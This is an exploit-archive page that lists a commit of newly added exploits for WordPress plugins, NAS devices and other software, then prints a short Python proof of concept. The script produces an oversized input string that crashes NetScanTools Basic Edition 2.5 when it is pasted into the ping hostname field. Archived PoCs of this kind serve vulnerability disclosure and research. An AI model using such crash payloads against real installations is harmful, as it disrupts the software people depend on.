582d8f748e
6 changes to exploits/shellcodes QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC) NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC) Skia - Heap Overflow in SkScan::FillPath due to Precision Error WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit) Wordpress Background Takeover < 4.1.4 - Directory Traversal WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal Wordpress < 4.9.6 - (Authenticated) Arbitrary File Deletion WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion WordPress Form Maker Plugin 1.12.24 - SQL Injection WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection WordPress Plugin Form Maker 1.12.24 - SQL Injection WordPress Plugin Contact Form Maker 1.12.20 - SQL Injection Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass) Online Trade 1 - Information Disclosure SoftNAS Cloud < 4.0.3 - OS Command Injection
25 lines
No EOL
844 B
Python
Executable file
25 lines
No EOL
844 B
Python
Executable file
# Exploit Title: NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)
|
|
# Discovery by: Luis Martínez
|
|
# Discovery Date: 2018-07-26
|
|
# Vendor Homepage: https://www.netscantools.com/
|
|
# Software Link : http://download.netscantools.com/nstb250.zip
|
|
# Tested Version: 2.5
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: Windows 10 Pro x64 es
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code : python NetScanTools_Basic_Edition_2.5.py
|
|
# 2.- Open NetScanTools_Basic_Edition_2.5.txt and copy content to clipboard
|
|
# 3.- Open NstBasic.exe
|
|
# 4.- Ping and Traceroute Tools
|
|
# 5.- Ping
|
|
# 6.- Paste ClipBoard on Target Hostname or IPv4 Address
|
|
# 7.- Do Ping
|
|
# 8.- Crashed
|
|
|
|
#!/usr/bin/env python
|
|
|
|
buffer = "\x41" * 1125
|
|
f = open ("NetScanTools_Basic_Edition_2.5.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |